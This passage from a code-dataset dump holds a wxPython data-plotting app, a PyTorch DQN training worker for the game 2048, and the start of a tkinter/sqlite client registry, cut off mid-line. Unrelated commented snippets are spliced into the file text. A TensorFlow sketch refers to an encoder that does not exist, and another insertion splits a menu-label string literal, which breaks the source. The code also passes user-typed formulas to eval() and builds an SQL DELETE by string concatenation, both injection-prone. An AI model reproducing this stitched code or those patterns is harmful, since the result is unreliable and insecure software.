nanchi.uitoolbar as tb # Toolbars (Toolbar, AxesToolbar, LineToolbar)\n from nanchi._const_ import * # Constants\n\n\nclass NanchiPlot(wx.Frame):\n def __init__(self,parent):\n wx.Frame.__init__(self,parent,title=NANCHI_MAIN_CAPTION,size=(800,600))\n self.initMenu()\n self.initCtrls()\n self.initCtrls()\n self.initToolBar()\n self.initSizers()\n self.initEvents()\n \n # Icon\n self.icon = wx.Icon(PATH_NANCHI_LOGO)\n self.SetIcon(self.icon)\n \n # Reference to main objects\n self.axes = self.notebook.graphs.axes\n self.figure = self.notebook.graphs.figure\n self.canvas = self.notebook.graphs.canvas\n self.data = self.notebook.data\n \n # Display on center\n self.Centre(True)\n self.Show()\n \n def initMenu(self):\n \"\"\"\n Creating menu bar\n \"\"\"\n m_file = wx.Menu()\n save = m_file.Append(-1, \"Save 
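# A stripped-down sketch of the probabilistic-head pattern the encoder above
# ends with: a Dense layer emits the parameters of a diagonal Gaussian,
# IndependentNormal turns them into a distribution, and the KL regularizer
# pulls that posterior toward the standard-normal prior. It assumes
# tensorflow-probability is installed; the input size is illustrative.
import tensorflow as tf
from tensorflow_probability import layers as tfpl, distributions as tfpd

latent_dim = 4
prior = tfpd.Independent(tfpd.Normal(loc=tf.zeros(latent_dim), scale=1.0),
                         reinterpreted_batch_ndims=1)
head = tf.keras.Sequential([
    tf.keras.layers.Dense(tfpl.IndependentNormal.params_size(latent_dim),
                          input_shape=(16,)),
    tfpl.IndependentNormal(
        latent_dim,
        convert_to_tensor_fn=tfpd.Distribution.sample,
        activity_regularizer=tfpl.KLDivergenceRegularizer(prior, weight=1.0)),
])
z = head(tf.zeros((2, 16)))
print(z.sample().shape)             # (2, 4)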
image... \\tCtrl+S\")\n export_img = m_file.Append(-1, \"Export data as image...\")\n export_txt = m_file.Append(-1, \"Export data as ASCII...\")\n m_file.AppendSeparator()\n import_data = m_file.Append(-1, \"Import data... \\tCtrl+I\")\n import_image = m_file.Append(-1, \"Import image...\")\n m_file.AppendSeparator()\n _exit = m_file.Append(-1, \"Quit \\tCtrl+Q\")\n \n m_help = wx.Menu()\n _help = m_help.Append(-1, \"Help\")\n about = m_help.Append(-1, \"About...\")\n \n menu_bar = wx.MenuBar()\n menu_bar.Append(m_file, \"File\")\n menu_bar.Append(m_help, \"Help\")\n self.SetMenuBar(menu_bar)\n \n self.Bind(wx.EVT_MENU, self.OnSave, save)\n self.Bind(wx.EVT_MENU, self.OnExportASCII, export_txt)\n self.Bind(wx.EVT_MENU, self.OnExportImage, export_img)\n \n self.Bind(wx.EVT_MENU, self.OnImport, import_data)\n self.Bind(wx.EVT_MENU, self.OnLoadImage, import_image)\n \n self.Bind(wx.EVT_MENU, self.OnAbout, about)\n self.Bind(wx.EVT_MENU, self.OnHelp, _help)\n self.Bind(wx.EVT_MENU, self.OnExit, _exit)\n \n def initSizers(self):\n \"\"\"\n Initialize sizers\n \"\"\"\n self.mainsz = wx.BoxSizer(wx.VERTICAL)\n self.panelsz = wx.BoxSizer(wx.HORIZONTAL)\n \n self.mainsz.Add(self.toolbar, 0, wx.EXPAND)\n self.panelsz.Add(self.notebook, 1, wx.EXPAND|wx.ALL, 2)\n\t\t\n self.panelsz.Add(self.axestoolbar, 0, wx.EXPAND|wx.ALL)\n self.panelsz.Add(self.linetoolbar, 0, wx.EXPAND|wx.ALL)\n\t\t\n self.mainsz.Add(self.mainpanel, 1, wx.EXPAND)\n \n self.mainpanel.SetSizer(self.panelsz)\n self.SetSizer(self.mainsz)\n \n def initCtrls(self):\n \"\"\"\n Initialize basic controls\n \"\"\"\n # Status bar\n self.SB_FONT = wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL)\n self.SB_FONT.SetFaceName(u\"DejaVu Sans Mono\")\n self.sb = aux.StatusBar(self, -1)\n self.sb.SetFont(self.SB_FONT)\n self.sb.SetForegroundColour(\"#aa00aa\")\n self.SetStatusBar(self.sb)\n self.sb.SetStatusText(SB_ON_INIT)\n \n self.mainpanel = wx.Panel(self,-1)\n self.notebook = ui.NanchiNoteBook(self.mainpanel)\n \n def initToolBar(self):\n \"\"\"\n Initialize tool bar\n \"\"\"\n self.toolbar = tb.MainToolbar(self)\n self.toolbar.Realize()\n \n self.axestoolbar = tb.AxesToolbar(self.mainpanel)\n self.axestoolbar.Realize()\n \n self.linetoolbar = tb.LineToolbar(self.mainpanel)\n self.linetoolbar.Realize()\n \n def initEvents(self):\n \"\"\"\n Initialize events\n \"\"\"\n self.graphs = self.notebook.graphs\n \n self.Bind(wx.EVT_TOOL, self.OnImport, self.toolbar.import_tool)\n self.Bind(wx.EVT_TOOL, self.OnLoadImage, self.toolbar.load_image_tool)\n self.Bind(wx.EVT_TOOL, self.OnFunction, self.toolbar.function_tool)\n self.Bind(wx.EVT_TOOL, self.OnBivariableFunction, self.toolbar.bivariable_function_tool)\n self.Bind(wx.EVT_TOOL, self.OnPlot, self.toolbar.plot_tool)\n self.Bind(wx.EVT_TOOL, self.OnBar, self.toolbar.bar_tool)\n self.Bind(wx.EVT_TOOL, self.OnScatter, self.toolbar.scatter_tool)\n self.Bind(wx.EVT_TOOL, self.OnPie, self.toolbar.pie_tool)\n self.Bind(wx.EVT_TOOL, self.OnImage, self.toolbar.image_tool)\n self.Bind(wx.EVT_TOOL, self.OnContour, self.toolbar.contour_tool)\n self.Bind(wx.EVT_TOOL, self.OnContourf, self.toolbar.contourf_tool)\n \n \n self.Bind(wx.EVT_TOOL, self.graphs.OnZoom, self.axestoolbar.zoom_box_tool)\n self.Bind(wx.EVT_TOOL, self.OnResetView, self.axestoolbar.reset_view_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnBackground, self.axestoolbar.axes_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnGridColor, self.axestoolbar.grid_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnGridStyle, 
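# Two notes on the NanchiPlot frame above. First, __init__ calls
# self.initCtrls() twice in a row — almost certainly an accidental
# duplicate, since the method rebuilds the status bar, panel and notebook
# each time it runs. Second, the menu wiring follows the standard wxPython
# pattern; a minimal self-contained sketch of it (assumes wxPython is
# installed):
import wx

class TinyFrame(wx.Frame):
    def __init__(self):
        super().__init__(None, title="menu demo")
        m_file = wx.Menu()
        quit_item = m_file.Append(-1, "Quit \tCtrl+Q")
        bar = wx.MenuBar()
        bar.Append(m_file, "File")
        self.SetMenuBar(bar)
        self.Bind(wx.EVT_MENU, lambda evt: self.Close(True), quit_item)

if __name__ == "__main__":
    app = wx.App(False)
    TinyFrame().Show()
    app.MainLoop()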
self.axestoolbar.grid_style_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnXLabel, self.axestoolbar.xlabel_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnYLabel, self.axestoolbar.ylabel_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnXTicks, self.axestoolbar.xticks_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnYTicks, self.axestoolbar.yticks_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnLineColor, self.linetoolbar.line_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnLineWidth, self.linetoolbar.line_width_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnLineStyle, self.linetoolbar.line_style_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnLineLabel, self.linetoolbar.line_label_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnShowLegend, self.linetoolbar.show_legend_tool)\n \n self.Bind(wx.EVT_TOOL, self.OnPieLabels, self.linetoolbar.pie_labels_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveLine, self.linetoolbar.move_line_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveText, self.linetoolbar.move_text_tool)\n \n self.Bind(wx.EVT_TOOL, self.OnPieLabels, self.linetoolbar.pie_labels_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveLine, self.linetoolbar.move_line_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveText, self.linetoolbar.move_text_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnText, self.linetoolbar.text_tool)\n\n \n def OnExit(self,event):\n \"\"\"\n File -> Quit \n \"\"\"\n self.Close(True)\n \n def OnHelp(self,event):\n \"\"\"\n Help -> Help\n \"\"\"\n try:\n os.startfile(PATH_DOCUMENTATION_HTML)\n except:\n \"\"\"\n Not exist file\n \"\"\"\n print(\"Help file not found\")\n pass\n \n def OnSave(self,event):\n \"\"\"\n File -> Save image... -> (Short-Cut) Ctrl + S\n \"\"\"\n wldc = ON_SAVE_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n self.figure.savefig(dlg.GetPath())\n dlg.Destroy()\n \n def OnExportASCII(self,event):\n data = self.data.grid_data.GetArrayData()\n wldc = ON_EXPORT_ASCII_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n fname = dlg.GetPath()\n io.write_txt(fname, data)\n dlg.Destroy()\n \n def OnExportImage(self,event):\n data = self.data.grid_data.GetArrayData()\n wldc = ON_EXPORT_IMAGE_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n fname = dlg.GetPath()\n io.imsave(fname, data)\n dlg.Destroy()\n \n \n def OnImport(self,event):\n \"\"\"\n Import data\n \"\"\"\n dlg = aux.ImportDialog(None)\n if dlg.ShowModal() == wx.ID_OK:\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n data = dlg.GetData()\n if data is None:\n self.sb.SetStatusText(SB_ON_IMPORT_DATA_FAIL%(path))\n del busy_dlg\n else:\n self.data.grid_data.SetArrayData(data)\n del busy_dlg\n dlg.Destroy()\n \n \n def OnLoadImage(self,event):\n \"\"\"\n Import images\n \"\"\"\n path = \"\"\n wildcard = ON_IMPORT_IMAGE_WILDCARD\n dlg = wx.FileDialog(self, message=\"Select an image\",\n defaultDir=os.getcwd(), wildcard=wildcard, style=wx.OPEN)\n if dlg.ShowModal() == wx.ID_OK:\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n path = dlg.GetPath()\n data = io.imread(path)\n self.data.grid_data.SetArrayData(data)\n self.sb.SetStatusText(SB_ON_IMPORT_IMAGE%(path))\n del busy_dlg\n else:\n self.sb.SetStatusText(SB_ON_IMPORT_IMAGE_CANCEL)\n dlg.Destroy()\n \n \n def OnFunction(self,event):\n \"\"\"\n Create data from f(x) function\n \"\"\"\n from numpy import 
(sin,cos,tan,log,exp)\n dialog = aux.FunctionDialog(None)\n if dialog.ShowModal() == wx.ID_OK:\n fx,a,b,points = dialog.GetData()\n try:\n x = np.linspace(float(a), float(b), float(points))\n fx = eval(fx)\n self.data.grid_data.SetArrayData(np.array([x,fx]).transpose())\n self.data.grid_data.SetColLabelValue(0,\"x\")\n self.data.grid_data.SetColLabelValue(1,\"f(x)\")\n self.sb.SetStatusText(SB_ON_CREATE_DATA_FUNCTION)\n except:\n self.sb.SetStatusText(SB_ERROR_ON_CREATE_DATA)\n dialog.Destroy()\n \n \n def OnBivariableFunction(self,event):\n \"\"\"\n Create data from f(x,y) function\n \"\"\"\n from numpy import (sin,cos,tan,log,exp)\n dialog = aux.BivariableFunctionDialog(None)\n if dialog.ShowModal() == wx.ID_OK:\n fxy,x,y,points = dialog.GetData()\n try:\n x1,x2 = [float(n) for n in x]\n y1,y2 = [float(n) for n in y]\n xx = np.linspace(x1, x2, points)\n yy = np.linspace(y1, y2, points)\n x,y = np.meshgrid(xx,yy)\n Z = eval(fxy)\n self.data.grid_data.SetArrayData(Z)\n self.sb.SetStatusText(SB_ON_CREATE_DATA_BIVARIABLE_FUNCTION)\n except:\n self.sb.SetStatusText(SB_ERROR_ON_CREATE_DATA)\n dialog.Destroy()\n \n def OnPlot(self,event):\n \"\"\"\n Line plot\n \"\"\"\n setplot.set_default_params(self.axes,self.figure)\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n if cols == 2: # Common case\n self.axes.plot(X[:,0],X[:,1], picker=True)\n elif cols == 1:\n self.axes.plot(X[:,0], picker=True)\n elif cols > 2:\n for col in range(cols):\n #clabel = self.data.grid_data.GetColLabelValue(col)\n self.axes.plot(X[:,col], picker=True)\n self.canvas.draw()\n del busy_dlg\n \n def OnPolar(self,event):\n \"\"\"\n Unavailable\n \n Possibility: Rectangular axes -> Polar axes (temporarily)\n \"\"\"\n pass\n \n def OnBar(self,event):\n \"\"\"\n Plot bars\n \"\"\"\n setplot.set_default_params(self.axes, self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape \n # Reference: http://matthiaseisen.com/pp/patterns/p0178/\n #\n # Space between bars groups (FACTOR)\n KB = 0.85\n # Counter\n k = 0\n # For each row\n for jj in range(rows):\n kw = 1.0/(cols+1.5) # bar width\n x = np.linspace(k, k+KB, cols, endpoint=False)\n self.axes.bar(x, X[jj,:], width=kw, color=BAR_COLOR_CYCLE)\n k += 1\n \n # For ticks\n STEP = 1.0\n INITIAL_TICK = KB/2.0 # Medium point\n END_TICK = rows\n _xticks = np.arange(INITIAL_TICK, END_TICK, STEP)\n self.axes.set_xticks(_xticks)\n \n # For xticklabels\n _tick_labels = range(1, rows+1)\n self.axes.set_xticklabels(_tick_labels)\n \n # Change xticklabels using \"X-Ticks\" icon (AxesToolbar)\n \n # Redraw\n self.canvas.draw()\n \n \n def OnScatter(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n if cols == 2: # Common case\n self.axes.plot(X[:,0], X[:,1], \"o\", color=\"#348ABD\")\n elif cols == 1: # one column\n self.axes.plot(X[:,0], \"o\", color=\"#348ABD\")\n self.canvas.draw()\n \n def OnPie(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n \n n = float(rows) \n from matplotlib import cm\n a=np.random.random(n)\n colors=cm.Set1(np.arange(n)/n)\n \n if cols == 1:\n _ , self.pie_labels = self.axes.pie(X[:,0], labels=X[:,0], colors=colors)\n self.axes.set_aspect(\"equal\")\n else:\n pass # nothing to do here\n self.canvas.draw()\n \n def OnPieLabels(self,event):\n if hasattr(self, \"pie_labels\"):\n dlg = aux.PieLabelsDialog(None, 
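# A note on OnFunction above: the sample count reaches np.linspace() as
# float(points), but linspace's num argument must be an integer (recent
# NumPy raises a TypeError for a float). A safer sketch of the same
# evaluate-a-user-formula step — int(points), and a restricted namespace
# instead of the bare eval used above:
import numpy as np

def eval_fx(expr, a, b, points):
    x = np.linspace(float(a), float(b), int(points))
    allowed = {"x": x, "sin": np.sin, "cos": np.cos, "tan": np.tan,
               "log": np.log, "exp": np.exp}
    fx = eval(expr, {"__builtins__": {}}, allowed)
    return np.column_stack([x, fx])

print(eval_fx("sin(x) + 0.5*cos(x)", 0, 6.28, 5))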
self.pie_labels)\n if dlg.ShowModal() == wx.ID_OK:\n dlg.GetData()\n dlg.Destroy()\n else:\n self.sb.SetStatusText(u\"Pie plots unavailables\")\n self.canvas.draw()\n \n def OnImage(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.imshow(X, cmap=cm.gray)\n self.canvas.draw()\n \n def OnContour(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.contour(X)\n self.canvas.draw()\n \n def OnContourf(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.contourf(X)\n self.canvas.draw()\n \n # OnReset\n \n def OnResetView(self,event):\n self.axes.autoscale()\n self.axes.set_aspect(\"auto\")\n self.canvas.disconnect_all()\n self.canvas.draw()\n \n def OnAbout(self,event):\n \"\"\"\n Show about dialog\n \"\"\"\n aux.AboutDialog(None)\n\n\nclass App(wx.App):\n \"\"\"\n Override OnInit\n \"\"\"\n def OnInit(self):\n frame = NanchiPlot(None)\n return True\n\n\ndef run():\n \"\"\"\n Entry point for nanchi\n \"\"\"\n REDIRECT = False\n LOG_FILE = \"nanchi.log\"\n app = App(REDIRECT)\n app.MainLoop()\n\n\nif __name__=='__main__':\n run() # Run app\n","repo_name":"JorgeDeLosSantos/NanchiPlot","sub_path":"nanchi/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16200,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"74180019251","text":"import datetime\nimport time\n\nimport gym\n# noinspection PyUnresolvedReferences\nimport gym_2048\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch import multiprocessing as mp\nfrom torch.autograd import Variable\nfrom torch.nn import functional\n\n\n# noinspection PyArgumentList\nclass Worker(mp.Process):\n def __init__(self, shared_model, target_model, optimizer, move_counter, episodes_counter, start_time, lock,\n args, last_1000, last_1000_loss, worker_id, eps_end):\n super(Worker, self).__init__()\n self.shared_model = shared_model\n self.target_model = target_model\n self.optimizer = optimizer\n self.move_counter = move_counter\n self.episodes_counter = episodes_counter\n self.start_time = start_time\n self.lock = lock\n self.args = args\n self.last_1000 = last_1000\n self.last_1000_loss = last_1000_loss\n self.rewards = []\n self.loss = []\n\n self.env = gym.make('2048-v0').unwrapped\n self.eps_end = eps_end\n self.eps = self.args.eps_start\n self.env.seed(self.args.seed)\n self.worker_id = worker_id\n\n if self.worker_id == 0:\n self.count_tested = 0\n self.output_file_name = './trained_models/ADQN_{date:%Y_%m_%d__%H_%M_%S}.txt'\\\n .format(date=datetime.datetime.now())\n\n if self.args.start_step != 0:\n self.eps -= self.args.start_step * ((self.args.eps_start - self.eps_end) / self.args.eps_decay)\n\n def game_state_to_input(self, game_state):\n if self.args.use_big_input:\n input_state = torch.FloatTensor(16, 4, 4).zero_()\n\n for i in range(4):\n for j in range(4):\n index = int(np.log2(game_state[i * 4 + j]) - 1) if game_state[i * 4 + j] != 0 else -1\n if index >= 0:\n input_state[index, i, j] = 1\n\n else:\n input_state = torch.FloatTensor(4, 4).zero_()\n\n for i in range(4):\n for j in range(4):\n input_state[i, j] = np.log2(game_state[i * 4 + j]) / 15 if game_state[i * 4 + j] != 0 else 0\n input_state = input_state.unsqueeze(0)\n\n return input_state.unsqueeze(0)\n\n def 
input_to_game_matrix(self, input_state):\n matrix = np.zeros((4, 4))\n\n if self.args.use_big_input:\n indices = input_state.nonzero()\n for exponent, i, j in indices:\n matrix[int(i), int(j)] = int(2**int(exponent+1))\n\n else:\n for i in range(4):\n for j in range(4):\n if input_state.data[0][i][j] != 0:\n matrix[i, j] = int(2 ** (input_state.data[0][i][j] * 15))\n\n return matrix\n\n def select_action(self, state):\n sample = np.random.random()\n\n if sample > self.eps:\n x = Variable(state, volatile=True).type(torch.FloatTensor)\n action = self.shared_model(x).data.sort(descending=True)[1]\n for i in range(4):\n if self.env.is_valid(action[0][i]):\n return torch.from_numpy(np.array([action[0][i]])).type(torch.LongTensor)\n else:\n arr = np.random.permutation([0, 1, 2, 3])\n for i in range(4):\n if self.env.is_valid(arr[i]):\n return torch.from_numpy(np.array([arr[i]])).type(torch.LongTensor)\n\n def optimize_model(self, states, rewards, actions, next_states):\n if len(next_states) == 1 and next_states[0] is None:\n return\n\n non_final_mask = torch.LongTensor([i for i, s in enumerate(next_states) if s is not None])\n non_final_next_states = Variable(torch.cat([s for s in next_states if s is not None]), volatile=True)\n\n state_batch = Variable(torch.cat(states))\n action_batch = Variable(torch.cat(actions))\n reward_batch = Variable(torch.cat(rewards))\n\n state_values = self.shared_model(state_batch)\n\n state_action_values = state_values.gather(1, action_batch)\n next_state_q_values = Variable(torch.zeros(len(states), 4).type(torch.FloatTensor))\n next_state_values = Variable(torch.zeros(len(states)).type(torch.FloatTensor))\n\n non_valid_action_mask = torch.FloatTensor(len(non_final_next_states), 4)\n for i in range(len(non_final_next_states)):\n for j in range(4):\n if self.env.is_valid(j, self.input_to_game_matrix(non_final_next_states[i])):\n non_valid_action_mask[i, j] = 0\n else:\n non_valid_action_mask[i, j] = float('-inf')\n\n model_result = self.target_model(non_final_next_states)\n next_state_q_values.data.index_copy_(0, non_final_mask, model_result.data)\n next_state_q_values[non_final_mask] += Variable(non_valid_action_mask)\n next_state_values[non_final_mask] = next_state_q_values[non_final_mask].max(1)[0]\n\n expected_state_action_values = (next_state_values * self.args.gamma) + reward_batch\n loss = functional.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n with self.lock:\n self.optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(self.target_model.parameters(), self.args.max_grad_norm)\n self.share_model()\n self.optimizer.step()\n\n if self.episodes_counter.value <= 1000:\n self.last_1000_loss.append(loss.data[0])\n else:\n self.last_1000_loss[self.episodes_counter.value % 1000] = loss.data[0]\n\n def share_model(self):\n for local_param, shared_param in zip(self.target_model.parameters(), self.shared_model.parameters()):\n if shared_param.grad is not None:\n return\n shared_param._grad = local_param.grad\n\n def test_performance(self):\n state = self.game_state_to_input(self.env.reset())\n episode = self.episodes_counter.value\n eps = self.eps\n self.eps = 0\n\n while True:\n action = self.select_action(state)\n\n next_state, reward, done, _ = self.env.step(action[0])\n state = self.game_state_to_input(next_state)\n\n if done:\n print('Episode: {}, Test Score: {}, Highest Tile: {}'.format(\n episode, self.env.score, self.env.highest()))\n print('MPS: {}, Moves: {}, Avg. 
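# The two helpers above encode a 2048 board either as a 16x4x4 one-hot stack
# (one channel per tile exponent) or as a 4x4 grid of log2(tile)/15, and
# decode it back to tile values. A torch-free numpy sketch of the compact
# round-trip, to make the convention concrete (board values illustrative):
import numpy as np

def encode(flat_board):                      # 16 ints, row-major
    grid = np.zeros((4, 4), dtype=np.float32)
    for i in range(4):
        for j in range(4):
            v = flat_board[i * 4 + j]
            grid[i, j] = np.log2(v) / 15 if v else 0.0
    return grid

def decode(grid):
    board = np.zeros((4, 4), dtype=np.int64)
    nz = grid.nonzero()
    board[nz] = 2 ** np.rint(grid[nz] * 15).astype(np.int64)
    return board

b = [0, 2, 4, 0] + [0] * 11 + [2048]
assert decode(encode(b)).flatten().tolist() == b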
1000 {}'.format(\n self.move_counter.value / (time.time() - self.start_time),\n self.move_counter.value, sum(self.last_1000) / 1000.))\n\n if self.episodes_counter.value >= 1000:\n self.loss.append(sum(self.last_1000_loss) / 1000.)\n self.rewards.append(sum(self.last_1000) / 1000.)\n plot_graphs(self.rewards, self.loss)\n output_file = open(self.output_file_name, 'a')\n output_file.write('{}, {}, {}, {}\\n'\n .format(sum(self.last_1000) / 1000., self.move_counter.value,\n self.episodes_counter.value, sum(self.last_1000_loss) / 1000.))\n output_file.flush()\n output_file.close()\n break\n\n self.eps = eps\n\n if self.count_tested % 10 == 0:\n print('Saving model')\n model_name = \"ADQN_\" + '{date:%Y_%m_%d__%H_%M_%S}'.format(date=datetime.datetime.now())\n torch.save({\n 'model': self.shared_model.state_dict(),\n 'optimizer': self.optimizer.state_dict()\n }, './trained_models/{}.pth'.format(model_name))\n\n self.count_tested += 1\n\n def run(self):\n moves = 0\n reward_sum = 0\n done = False\n t = 0\n\n state = self.env.reset()\n states = [(state, 0)]\n state = self.game_state_to_input(state)\n\n while True:\n if done:\n reward_sum = 0\n moves = 0\n\n batch_states = []\n batch_rewards = []\n batch_actions = []\n batch_next_states = []\n\n for step in range(self.args.num_steps):\n with self.lock:\n self.move_counter.value += 1\n\n if self.move_counter.value % 40000 == 0:\n self.target_model.load_state_dict(self.shared_model.state_dict())\n\n moves += 1\n t += 1\n\n action = self.select_action(state)\n\n next_state, reward, done, _ = self.env.step(action[0])\n\n reward = np.log2(reward) / 15 if reward != 0 else 0\n reward_sum += reward\n states.append((next_state, reward_sum))\n\n next_state = self.game_state_to_input(next_state)\n\n if done:\n next_state = None\n\n batch_rewards.append(torch.FloatTensor([reward]))\n batch_actions.append(torch.LongTensor([[action[0]]]))\n batch_states.append(state)\n batch_next_states.append(next_state)\n\n state = next_state\n\n if self.eps > self.eps_end:\n self.eps -= (self.args.eps_start - self.eps_end) / self.args.eps_decay\n\n if done:\n test = False\n with self.lock:\n self.episodes_counter.value += 1\n\n if self.episodes_counter.value <= 1000:\n self.last_1000.append(reward_sum)\n else:\n self.last_1000[self.episodes_counter.value % 1000] = reward_sum\n\n if self.worker_id == 0 and self.episodes_counter.value > 100 * (self.count_tested + 1):\n test = True\n\n if test:\n self.test_performance()\n\n if len(states) > 50:\n state, reward_sum = states[int(len(states) / 2)]\n self.env.Matrix = state.reshape((4, 4))\n states = [(state, reward_sum)]\n else:\n state = self.env.reset()\n states = [(state, 0)]\n state = self.game_state_to_input(state)\n\n break\n\n self.optimize_model(batch_states, batch_rewards, batch_actions, batch_next_states)\n\n\ndef plot_graphs(rewards, loss):\n plt.figure(1)\n plt.clf()\n plt.title('Training')\n plt.xlabel('Episode')\n plt.ylabel('Score')\n plt.plot(np.array(rewards))\n\n if len(rewards) >= 100:\n means = [np.array(rewards[i:i+100]).mean() for i in range(0, len(rewards), 100)]\n plt.plot(means)\n\n plt.pause(0.001)\n\n plt.figure(2)\n plt.clf()\n plt.title('Training')\n plt.xlabel('Episode')\n plt.ylabel('Loss')\n plt.plot(np.array(loss))\n\n plt.pause(0.001)\n","repo_name":"BenediktKersjes/rl_2048","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":11033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7899516268","text":"from 
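# Two scheduling details of the worker loop above, isolated: the linear
# per-move epsilon decay (floored at eps_end) and the hard sync of the
# target network every 40000 global moves. The constants are illustrative
# stand-ins for the args the worker receives.
eps_start, eps_end, eps_decay = 1.0, 0.1, 100_000
sync_every = 40_000

eps = eps_start
for move in range(1, 200_001):
    if eps > eps_end:
        eps -= (eps_start - eps_end) / eps_decay
    if move % sync_every == 0:
        pass  # here: target_model.load_state_dict(shared_model.state_dict())
print(round(eps, 3))   # ~0.1 once the move count exceeds eps_decay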
tkinter import *\nfrom tkinter import ttk\nimport sqlite3\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter, A4\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import SimpleDocTemplate, Image\nimport webbrowser\nimport base64\n\nroot = Tk()\n\nclass relatorios():\n def printCliente(self):\n webbrowser.open(\"cliente.pdf\")\n \n def geraRelatCliente(self):\n self.c = canvas.Canvas(\"cliente.pdf\")\n self.codigoRel = self.codigo_entry.get()\n self.clienteRel = self.cliente_entry.get()\n self.telefoneRel = self.telefone_entry.get()\n self.cpfRel = self.cpf_entry.get()\n\n self.c.setFont(\"Helvetica-Bold\",24)\n self.c.drawString(200, 790, \"Ficha do Cliente\" )\n self.c.setFont(\"Helvetica-Bold\",14)\n self.c.drawString(100, 750, 'Nome: ') \n self.c.drawString(100, 720, 'Telefone: ')\n self.c.drawString(100, 690, 'Cpf: ')\n\n self.c.setFont(\"Helvetica\",14)\n self.c.drawString(200, 750, self.clienteRel) \n self.c.drawString(200, 720, self.telefoneRel)\n self.c.drawString(200, 690, self.cpfRel)\n\n self.c.rect(20, 630, 550, 200, fill=False, stroke=True)\n\n \n self.c.showPage()\n self.c.save()\n self.printCliente()\n\nclass funcs():\n\n def limpa_tela(self):\n self.codigo_entry.delete(0, END)\n self.cliente_entry.delete(0, END)\n self.telefone_entry.delete(0, END)\n self.cpf_entry.delete(0, END)\n\n def conecta_db(self):\n self.conn=sqlite3.connect(\"LCBL.db\")\n self.cursor=self.conn.cursor()\n\n def desconecta_db(self):\n self.conn.close()\n\n def monta_tabelas(self):\n self.conecta_db()\n self.cursor.execute(\"CREATE TABLE if not exists clientes(nome_do_cliente text, telefone text, cpf text )\")\n self.conn.commit()\n self.desconecta_db()\n\n def variaveis(self):\n self.cod=self.codigo_entry.get()\n self.cliente=self.cliente_entry.get()\n self.telefone=self.telefone_entry.get()\n self.cpf=self.cpf_entry.get()\n\n def add_clientes(self):\n #self.codigo=self.codigo=self.codigo_enrty.get()\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"INSERT INTO clientes (nome_do_cliente, telefone, cpf) values (?, ?, ?)\",(self.cliente, self.telefone, self.cpf))\n self.conn.commit()\n \n self.desconecta_db()\n self.select_lista()\n self.limpa_tela()\n\n def select_lista(self):\n self.l_cliente.delete(*self.l_cliente.get_children())\n self.conecta_db()\n lista=self.cursor.execute(\"SELECT rowid, * FROM clientes ORDER BY rowid ASC;\")\n for i in lista:\n self.l_cliente.insert(\"\", END, values=i)\n self.desconecta_db()\n\n def onDoubleClick(self, event):\n self.limpa_tela()\n self.l_cliente.selection()\n\n for n in self.l_cliente.selection():\n col1 ,col2, col3, col4= self.l_cliente.item(n, 'values')\n self.codigo_entry.insert(END,col1)\n self.cliente_entry.insert(END,col2)\n self.telefone_entry.insert(END,col3)\n self.cpf_entry.insert(END,col4)\n\n def deletar(self):\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"DELETE FROM clientes WHERE rowid = \"+self.cod+\" \")\n self.conn.commit()\n self.desconecta_db()\n self.limpa_tela()\n self.select_lista()\n \n def alterar(self):\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"UPDATE clientes SET nome_do_cliente = (?), telefone = (?), cpf = (?) 
